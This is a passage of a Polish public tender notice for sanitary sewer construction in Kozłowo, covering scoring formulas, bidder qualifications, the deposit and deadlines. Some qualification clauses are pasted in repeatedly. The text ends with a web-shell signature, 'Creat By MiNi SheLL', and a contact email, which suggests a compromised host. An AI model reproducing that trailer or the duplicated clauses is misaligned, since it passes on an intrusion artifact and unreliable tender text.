ściekowej</span></h3> <h3 class="mb-0">4.2.7.) Dodatkowy kod CPV: </h3> <p class="mb-0">45231300-8 - Roboty budowlane w zakresie budowy wodociągów i rurociągów do odprowadzania ścieków</p> <p class="mb-0">45233142-6 - Roboty w zakresie naprawy dróg</p> <p class="mb-0">45255600-5 - Roboty w zakresie kładzenia rur w kanalizacji</p> <p class="mb-0">45311000-0 - Roboty w zakresie okablowania oraz instalacji elektrycznych</p> <h3 class="mb-0">4.2.8.) Zamówienie obejmuje opcje: <span class="normal">Nie</span></h3> <h3 class="mb-0">4.2.10.) Okres realizacji zamówienia albo umowy ramowej: <span class="normal">do 2022-06-30</span></h3> <h3 class="mb-0">4.2.11.) Zamawiający przewiduje wznowienia: <span class="normal">Nie</span></h3> <h3 class="mb-0">4.2.13.) Zamawiający przewiduje udzielenie dotychczasowemu wykonawcy zamówień na podobne usługi lub roboty budowlane: <span class="normal">Nie</span></h3> <h3 class="mb-0">4.3.) Kryteria oceny ofert: </h3> <h3 class="mb-0">4.3.1.) Sposób oceny ofert: <span class="normal">2.	Przy wyborze oferty Zamawiający będzie się kierował następującymi kryteriami (osobno dla każdej części):<br/><br/>2.1.	Kryterium „cena” - wskaźnik C, ranga - 60%.<br/>Wskaźnik C obliczany jest wg wzoru:<br/>C = (C m / C b) x 100 pkt x 60%<br/>gdzie:<br/>C m - najniższa cena oferty, C b - cena oferty badanej<br/><br/>2.2.	Kryterium „gwarancja i rękojmia” - wskaźnik G, ranga - 40%.<br/><br/>2.2.1.	Zamawiający ustala minimalny wymagany termin udzielonej przez Wykonawcę gwarancji i rękojmi na wykonane roboty budowlane oraz użyte/dostarczone materiały na okres 36<br/>miesięcy, licząc od dnia bezusterkowego końcowego odbioru robót. Wykonawca może przedłużyć termin gwarancji i rękojmi na wykonane roboty budowlane oraz użyte/dostarczone materiały na okres maksymalnie 60 miesięcy, licząc od dnia bezusterkowego końcowego odbioru robót, z wyłączeniem zieleni, na którą Wykonawca udziela gwarancji i rękojmi na okres 12 miesięcy. Jeżeli Wykonawca udzieli gwarancji na okres dłuższy niż 60 miesięcy, Zamawiający obliczając ilość punktów w kryterium „gwarancja i rękojmia”, będzie traktował taki zapis tak, jak gdyby Wykonawca udzielił gwarancji i rękojmi na okres 60 miesięcy. Do umowy również zostanie wprowadzony termin gwarancji i rękojmi na wykonane roboty budowlane oraz użyte/dostarczone materiały na okres 60 miesięcy, licząc od dnia bezusterkowego końcowego odbioru robót (pomimo proponowanego w ofercie przez Wykonawcę dłuższego okresu gwarancji).<br/>2.2.2.	W przypadku, gdy Wykonawca nie poda żadnego okresu gwarancji w Formularzu oferty, Zamawiający przyjmie, że Wykonawca udziela gwarancji na okres 36 miesięcy.<br/>2.2.3.	Jeżeli Wykonawca w Formularzu oferty zaoferuje okres gwarancji krótszy, niż wymagane 36 miesięcy, Zamawiający odrzuci jego ofertę na podstawie art. 226 ust. 1 pkt 5 Ustawy.<br/><br/>Wskaźnik G obliczany jest wg wzoru:<br/>G = (G b / G m) x 100 pkt. x 40%<br/>gdzie:<br/>G b - ilość miesięcy udzielonej gwarancji i rękojmi w ofercie badanej,<br/>G m - największa ilość miesięcy udzielonej gwarancji i rękojmi w złożonych ofertach <br/>Wymagane jest podanie w ofercie okresu gwarancji w miesiącach.<br/><br/>3.	Końcowa ocena oferty to suma punktów uzyskanych za poszczególne kryteria wg wzoru:<br/>Lp = C + G<br/>gdzie:<br/>Lp - liczba punktów uzyskanych przez ofertę,<br/>C - liczba punktów uzyskanych w kryterium „cena”,<br/>G - liczba punktów uzyskanych w kryterium „gwarancja i rękojmia”.<br/>4.	Najkorzystniejsza oferta to oferta, która przedstawia najkorzystniejszy bilans ceny i innych kryteriów, czyli oferta, która uzyska najwyższą sumaryczną liczbę punktów (liczoną do dwóch miejsc po przecinku)</span></h3> <h3 class="mb-0">4.3.2.) Sposób określania wagi kryteriów oceny ofert: <span class="normal">Punktowo</span></h3> <h3 class="mb-0">4.3.3.) Stosowane kryteria oceny ofert: <span class="normal"> Kryterium ceny oraz kryteria jakościowe </span></h3> <h3 class="mb-0">Kryterium 1</h3> <h3 class="mb-0">4.3.5.) Nazwa kryterium: <span class="normal">Cena</span></h3> <h3 class="mb-0">4.3.6.) Waga: <span class="normal">60</span></h3> <h3 class="mb-0">Kryterium 2</h3> <h3 class="mb-0">4.3.4.) Rodzaj kryterium: <span class="normal">inne.</span></h3> <h3 class="mb-0">4.3.5.) Nazwa kryterium: <span class="normal">gwarancja i rękojmia</span></h3> <h3 class="mb-0">4.3.6.) Waga: <span class="normal">40</span></h3> <h3 class="mb-0">4.3.10.) Zamawiający określa aspekty społeczne, środowiskowe lub innowacyjne, żąda etykiet lub stosuje rachunek kosztów cyklu życia w odniesieniu do kryterium oceny ofert: <span class="normal">Nie</span></h3> <h2 class="bg-light p-3 mt-4">SEKCJA V - KWALIFIKACJA WYKONAWCÓW</h2> <h3 class="mb-0">5.1.) Zamawiający przewiduje fakultatywne podstawy wykluczenia: <span class="normal">Tak</span></h3> <h3 class="mb-0">5.2.) Fakultatywne podstawy wykluczenia: </h3> <p class="mb-0">Art. 109 ust. 1 pkt 4</p> <h3 class="mb-0">5.3.) Warunki udziału w postępowaniu: <span class="normal">Tak</span></h3> <h3 class="mb-0">5.4.) Nazwa i opis warunków udziału w postępowaniu.</h3> 2.	O udzielenie zamówienia mogą ubiegać się Wykonawcy, którzy spełniają warunki udziału w postępowaniu dotyczące:<br/>2.1.	Zdolności do występowania w obrocie gospodarczym.<br/>Zamawiający nie wyznacza szczegółowego warunku w tym zakresie<br/>2.2.	Uprawnień do prowadzenia określonej działalności gospodarczej lub zawodowej, o ile wynika to z odrębnych przepisów.<br/>Zamawiający nie wyznacza szczegółowego warunku w tym zakresie<br/>2.3.	Sytuacji ekonomicznej lub finansowej.<br/>Zamawiający nie wyznacza szczegółowego warunku w tym zakresie<br/>2.4.	Zdolności technicznej lub zawodowej - o udzielenie zamówienia mogą ubiegać się Wykonawcy, którzy wykażą, że: posiadają wiedzę i doświadczenie niezbędne do wykonania przedmiotu zamówienia, tj.<br/>w okresie ostatnich pięciu lat przed upływem terminu składania ofert, a jeżeli okres<br/>prowadzenia działalności jest krótszy - w tym okresie, wykonali co najmniej jedną robotę budowlaną polegającą na budowie, przebudowie, modernizacji lub remoncie sieci kanalizacji sanitarnej, o wartości brutto nie mniejszej niż 500 000,00 zł brutto (słownie: pięćset tysięcy złotych). <h3 class="mb-0">5.5.) Zamawiający wymaga złożenia oświadczenia, o którym mowa w art.125 ust. 1 ustawy: <span class="normal">Tak</span></h3> <h3 class="mb-0"> 5.6.) Wykaz podmiotowych środków dowodowych na potwierdzenie niepodlegania wykluczeniu: <span class="normal">Zamawiający wezwie wykonawcę, którego oferta została najwyżej oceniona, do złożenia w wyznaczonym terminie, nie krótszym niż 5 dni od dnia wezwania, aktualnych na dzień złożenia następujących podmiotowych środków dowodowych potwierdzających:<br/>Brak podstaw wykluczenia:<br/>-oświadczenia wykonawcy, w zakresie art. 108 ust. 1 pkt 5 ustawy, o braku przynależności do tej samej grupy kapitałowej w rozumieniu ustawy z dnia 16 lutego 2007 r. o ochronie konkurencji i konsumentów (Dz. U. z 2020 r. poz. 1076 i 1086), z innym wykonawcą, który złożył odrębną ofertę, albo oświadczenia o przynależności do tej samej grupy kapitałowej wraz z dokumentami lub<br/>informacjami potwierdzającymi przygotowanie oferty niezależnie od innego wykonawcy należącego do tej samej grupy kapitałowej, zgodnie ze wzorem stanowiącym załącznik nr 3 do SWZ;<br/><br/>2.2.1. Jeżeli wykonawca ma siedzibę lub miejsce zamieszkania poza granicami Rzeczypospolitej Polskiej, zamiast dokumentu jak wyżej, składa dokument lub dokumenty wystawione w kraju, w którym wykonawca ma siedzibę lub miejsce zamieszkania, potwierdzające, że nie otwarto jego likwidacji, nie ogłoszono upadłości, jego aktywami nie zarządza likwidator lub sąd, nie zawarł układu z wierzycielami, jego działalność gospodarcza nie jest zawieszona ani nie znajduje się on w innej tego rodzaju sytuacji wynikającej z podobnej procedury przewidzianej w przepisach miejsca wszczęcia tej procedury.<br/><br/>2.2.2.Jeżeli w kraju, w którym wykonawca ma siedzibę lub miejsce zamieszkania lub miejsce zamieszkania ma osoba, której dokument dotyczy, nie wydaje się dokumentów, o których mowa powyżej, zastępuje się je dokumentem zawierającym odpowiednio oświadczenie wykonawcy, ze wskazaniem osoby albo osób uprawnionych do jego reprezentacji, lub oświadczenie osoby, której dokument miał dotyczyć, złożone pod przysięgą, lub, jeżeli w kraju, w którym wykonawca ma siedzibę lub miejsce zamieszkania nie ma przepisów o oświadczeniu pod przysięgą, złożone przed organem sądowym lub administracyjnym, notariuszem, organem samorządu zawodowego lub gospodarczego, właściwym ze względu na siedzibę lub miejsce zamieszkania wykonawcy.<br/>postępowaniu.<br/>2.	O udzielenie zamówienia mogą ubiegać się Wykonawcy, którzy spełniają warunki udziału w postępowaniu dotyczące:<br/>2.1.	Zdolności do występowania w obrocie gospodarczym.<br/>Zamawiający nie wyznacza szczegółowego warunku w tym zakresie<br/>2.2.	Uprawnień do prowadzenia określonej działalności gospodarczej lub zawodowej, o ile wynika to z odrębnych przepisów.<br/>Zamawiający nie wyznacza szczegółowego warunku w tym zakresie<br/>2.3.	Sytuacji ekonomicznej lub finansowej.<br/>Zamawiający nie wyznacza szczegółowego warunku w tym zakresie<br/>2.4.	Zdolności technicznej lub zawodowej - o udzielenie zamówienia mogą ubiegać się Wykonawcy, którzy wykażą, że: posiadają wiedzę i doświadczenie niezbędne do wykonania przedmiotu zamówienia, tj.<br/>w okresie ostatnich pięciu lat przed upływem terminu składania ofert, a jeżeli okres<br/>prowadzenia działalności jest krótszy - w tym okresie, wykonali co najmniej jedną robotę budowlaną polegającą na budowie, przebudowie, modernizacji lub remoncie sieci kanalizacji sanitarnej, o wartości brutto nie mniejszej niż 500 000,00 zł brutto (słownie: pięćset tysięcy złotych).</span> </h3> <h3 class="mb-0"> 5.7.) Wykaz podmiotowych środków dowodowych na potwierdzenie spełniania warunków udziału w postępowaniu: <span class="normal">O udzielenie zamówienia mogą ubiegać się Wykonawcy, którzy wykażą, że: posiadają wiedzę i doświadczenie niezbędne do wykonania przedmiotu zamówienia, tj.<br/>w okresie ostatnich pięciu lat przed upływem terminu składania ofert, a jeżeli okres<br/>prowadzenia działalności jest krótszy - w tym okresie, wykonali co najmniej jedną robotę budowlaną polegającą na budowie, przebudowie, modernizacji lub remoncie sieci kanalizacji sanitarnej, o wartości brutto nie mniejszej niż 500 000,00 zł brutto (słownie: pięćset tysięcy złotych).<br/>w okresie ostatnich pięciu lat przed upływem terminu składania ofert, a jeżeli okres<br/>prowadzenia działalności jest krótszy - w tym okresie, wykonali co najmniej jedną robotę budowlaną polegającą na budowie, przebudowie, modernizacji lub remoncie sieci kanalizacji sanitarnej, o wartości brutto nie mniejszej niż 500 000,00 zł brutto (słownie: pięćset tysięcy złotych).</span> </h3> <h3 class="mb-0">5.8.) Wykaz przedmiotowych środków dowodowych: </h3> W celu potwierdzenia spełniania warunków udziału w postępowaniu zamawiający żąda załączenia do oferty:<br/><br/>2.2.4	Wykazu robót budowlanych, zgodnego ze wzorem stanowiącym załącznik nr 4 do SWZ, spełniających wymagania określone w punkcie IV.2.4.1 SWZ wykonanych nie wcześniej niż w okresie ostatnich 5 lat przed upływem terminu składania ofert, a jeżeli okres prowadzenia działalności jest krótszy - w tym okresie, wraz z podaniem ich rodzaju, wartości, daty i miejsca wykonania oraz podmiotów, na rzecz których roboty te zostały wykonane, oraz załączeniem dowodów określających, czy te roboty budowlane zostały wykonane należycie, przy czym dowodami, o których mowa, są referencje bądź inne dokumenty sporządzone przez podmiot, na rzecz którego roboty budowlane zostały wykonane, a jeżeli wykonawca z przyczyn niezależnych od niego nie jest w stanie uzyskać tych dokumentów - inne odpowiednie dokumenty;<br/>2.2.5	Wykazu osób, zgodnego ze wzorem stanowiącym załącznik nr 5 do SWZ, skierowanych przez wykonawcę do realizacji zamówienia publicznego, spełniających wymagania określone w punkcie<br/>IV.2.4.2 SWZ wraz z informacjami na temat ich kwalifikacji zawodowych, uprawnień, doświadczenia i wykształcenia niezbędnych do wykonania zamówienia publicznego, a także zakresu wykonywanych przez nie czynności oraz informacją o podstawie do dysponowania tymi osobami.<br/>3	Jeżeli jest to niezbędne do zapewnienia odpowiedniego przebiegu postępowania o udzielenie zamówienia, zamawiający może na każdym etapie postępowania, wezwać wykonawców do złożenia wszystkich lub niektórych podmiotowych środków dowodowych, jeżeli wymagał ich złożenia w ogłoszeniu o zamówieniu lub dokumentach zamówienia, aktualnych na dzień ich złożenia.<br/>4	Jeżeli zachodzą uzasadnione podstawy do uznania, że złożone uprzednio podmiotowe środki dowodowe nie są już aktualne, zamawiający może w każdym czasie wezwać wykonawcę lub wykonawców do złożenia wszystkich lub niektórych podmiotowych środków dowodowych, aktualnych na dzień ich złożenia.<br/>5	Zamawiający nie wzywa do złożenia podmiotowych środków dowodowych, jeżeli może je uzyskać za<br/>pomocą bezpłatnych i ogólnodostępnych baz danych, w szczególności rejestrów publicznych w rozumieniu<br/>ustawy z dnia 17 lutego 2005 r. o informatyzacji działalności podmiotów realizujących zadania publiczne, o ile wykonawca wskazał w oświadczeniu, o którym mowa w art. 125 ust 1, dane umożliwiające dostęp do tych środków.<br/>postępowaniu.<br/>2.	O udzielenie zamówienia mogą ubiegać się Wykonawcy, którzy spełniają warunki udziału w postępowaniu dotyczące:<br/>2.1.	Zdolności do występowania w obrocie gospodarczym.<br/>Zamawiający nie wyznacza szczegółowego warunku w tym zakresie<br/>2.2.	Uprawnień do prowadzenia określonej działalności gospodarczej lub zawodowej, o ile wynika to z odrębnych przepisów.<br/>Zamawiający nie wyznacza szczegółowego warunku w tym zakresie<br/>2.3.	Sytuacji ekonomicznej lub finansowej.<br/>Zamawiający nie wyznacza szczegółowego warunku w tym zakresie<br/>2.4.	Zdolności technicznej lub zawodowej - o udzielenie zamówienia mogą ubiegać się Wykonawcy, którzy wykażą, że: posiadają wiedzę i doświadczenie niezbędne do wykonania przedmiotu zamówienia, tj.<br/>w okresie ostatnich pięciu lat przed upływem terminu składania ofert, a jeżeli okres<br/>prowadzenia działalności jest krótszy - w tym okresie, wykonali co najmniej jedną robotę budowlaną polegającą na budowie, przebudowie, modernizacji lub remoncie sieci kanalizacji sanitarnej, o wartości brutto nie mniejszej niż 500 000,00 zł brutto (słownie: pięćset tysięcy złotych). <h3 class="mb-0">5.9.) Zamawiający przewiduje uzupełnienie przedmiotowych środków dowodowych: <span class="normal">Nie</span></h3> <h3 class="mb-0">5.11.) Wykaz innych wymaganych oświadczeń lub dokumentów: </h3> Termin realizacji zamówienia Zamawiający ustala następująco:<br/>- dla części I - w terminie do dnia 30 czerwca 2022 r. (w tym odcinek kanalizacji sanitarnej w ul. Leśnej w Kozłowie w terminie 30 dni licząc od dnia zawarcia umowy).<br/>- dla części II - w terminie do dnia 30 czerwca 2022 r. licząc od dnia zawarcia umowy.<br/>2.	Szczegółowe zagadnienia dotyczące terminu realizacji umowy uregulowane są we Wzorze umowy, stanowiącym załącznik nr 6 do SWZ.<br/>Pełen wykaz wymaganych oświadczeń i dokumentów zawarty jest w SWZ postępowania. <h2 class="bg-light p-3 mt-4">SEKCJA VI - WARUNKI ZAMÓWIENIA</h2> <h3 class="mb-0">6.1.) Zamawiający wymaga albo dopuszcza oferty wariantowe: <span class="normal">Nie</span></h3> <h3 class="mb-0">6.3.) Zamawiający przewiduje aukcję elektroniczną: <span class="normal">Nie</span></h3> <h3 class="mb-0">6.4.) Zamawiający wymaga wadium: <span class="normal">Tak</span></h3> <h3 class="mb-0">6.4.1) Informacje dotyczące wadium: </h3> 1.Zamawiający w niniejszym postępowaniu wymaga wniesienia wadium w wysokości po 2000zł. na każdą z dwóch części zamówienia.<br/> 2.Wadium wnosi się przed upływem terminu składania ofert z terminem obowiązywania do terminu związania ofertą ( 30 dni).<br/> 3. Wadium może być wniesione wg. wyboru wykonawcy w:<br/> - pieniądzu<br/> - gwarancjach bankowych<br/> - gwarancjach ubezpieczeniowych<br/> - poręczeniach udzielanych przez podmioty, o których mowa w art. 6b ust.5 pkt 2 ustawy z dnia 9 listopada 2000r. o utworzeniu Polskiej Agencji Przedsiębiorczości ( Dz. U. z 2019r.poz.310,836 i 1572).<br/> 4. W przypadku wnoszenia wadium w pieniądzu należy dokonać wpłaty ( zgodnie z poniższą zasadą) na poniższy nr rachunku bankowego Zamawiającego <br/>88	8834 1022 2002 0300 0101 0006<br/>– z dopiskiem w przypadku składania oferty na cz. I przetarg na<br/>„Budowa sieci kanalizacji sanitarnej w miejscowości Kozłowo”- cz. I<br/>– z dopiskiem w przypadku składania oferty na cz. II przetarg na<br/>„Budowa sieci kanalizacji sanitarnej w miejscowości Kozłowo”- cz. II<br/>– z dopiskiem w przypadku składania oferty na cz. I i II przetarg na<br/>„Budowa sieci kanalizacji sanitarnej w miejscowości Kozłowo”- cz. I i II<br/>5.W przypadku wniesienia wadium w formie gwarancji lub poręczenia o których wyżej mowa wykonawca przekaże wraz ze złożoną ofertą oryginał gwarancji lub poręczenia w postaci elektronicznej.<br/>6. Zamawiający dokona zwrotu wadium na warunkach określonych w art. 98 ustawy Prawo zamówień publicznych. <h3 class="mb-0">6.5.) Zamawiający wymaga zabezpieczenia należytego wykonania umowy: <span class="normal">Tak</span></h3> <h3 class="mb-0">6.6.) Wymagania dotyczące składania oferty przez wykonawców wspólnie ubiegających się o udzielenie zamówienia: </h3> 1.	Wykonawcy mogą wspólnie ubiegać się o udzielenie zamówienia. W takim przypadku Wykonawcy<br/>ustanawiają pełnomocnika do reprezentowania ich w postępowaniu albo do reprezentowania i zawarcia umowy w sprawie zamówienia publicznego. Pełnomocnictwo winno być załączone do oferty.<br/>2.	W odniesieniu do warunków dotyczących wykształcenia, kwalifikacji zawodowych lub doświadczenia wykonawcy wspólnie ubiegający się o udzielenie zamówienia mogą polegać na zdolnościach tych z wykonawców, którzy wykonają roboty budowlane lub usługi, do realizacji których te zdolności są wymagane.<br/>3.	Wykonawcy wspólnie ubiegający się o udzielenie zamówienia dołączają do oferty oświadczenie,<br/>z którego wynika, które roboty budowlane, dostawy lub usługi wykonają poszczególni wykonawcy.<br/><br/>4.	Oświadczenia i dokumenty potwierdzające brak podstaw do wykluczenia z postępowania składa każdy z Wykonawców wspólnie ubiegających się o zamówienie. <h3 class="mb-0">6.7.) Zamawiający przewiduje unieważnienie postępowania, jeśli środki publiczne, które zamierzał przeznaczyć na sfinansowanie całości lub części zamówienia nie zostały przyznane: <span class="normal">Nie</span></h3> <h2 class="bg-light p-3 mt-4">SEKCJA VII - PROJEKTOWANE POSTANOWIENIA UMOWY</h2> <h3 class="mb-0">7.1.) Zamawiający przewiduje udzielenia zaliczek: <span class="normal">Nie</span></h3> <h3 class="mb-0">7.3.) Zamawiający przewiduje zmiany umowy: <span class="normal">Tak</span></h3> <h3 class="mb-0">7.4.) Rodzaj i zakres zmian umowy oraz warunki ich wprowadzenia: </h3> 1.	Wybrany Wykonawca jest zobowiązany do zawarcia umowy w sprawie zamówienia publicznego na warunkach określonych we Wzorze umowy, stanowiącym załącznik nr 6 do SWZ.<br/>2.	Zakres świadczenia Wykonawcy wynikający z umowy jest tożsamy z jego zobowiązaniem zawartym w ofercie.<br/>3.	Zamawiający przewiduje możliwość zmiany zawartej umowy w stosunku do treści wybranej oferty<br/>w zakresie uregulowanym w art. 454-455 Pzp. oraz wskazanym we Wzorze umowy, stanowiącym<br/>załącznik nr 6 do SWZ.<br/>4.	Zmiana umowy wymaga dla swej ważności, pod rygorem nieważności, zachowania formy pisemnej. <h3 class="mb-0">7.5.) Zamawiający uwzględnił aspekty społeczne, środowiskowe, innowacyjne lub etykiety związane z realizacją zamówienia: <span class="normal">Nie</span></h3> <h2 class="bg-light p-3 mt-4">SEKCJA VIII – PROCEDURA</h2> <h3 class="mb-0">8.1.) Termin składania ofert: <span class="normal">2021-09-14 10:00</span></h3> <h3 class="mb-0">8.2.) Miejsce składania ofert: <span class="normal">Ofertę wraz z wymaganymi dokumentami należy umieścić na Platformie pod adresem: https://platformazakupowa.pl/pn/kozlowo na stronie dotyczącej odpowiedniego postępowania do dnia 14.09.2021 r. do godz. 10.00</span></h3> <h3 class="mb-0">8.3.) Termin otwarcia ofert: <span class="normal">2021-09-14 12:00</span></h3> <h3 class="mb-0">8.4.) Termin związania ofertą: <span class="normal"> 30 dni </span></h3> <h2 class="bg-light p-3 mt-4">SEKCJA IX – POZOSTAŁE INFORMACJE</h2> Pełen wykaz wymaganych oświadczeń i dokumentów zawarty jest w SWZ postępowania.

Creat By MiNi SheLL
Email: jattceo@gmail.com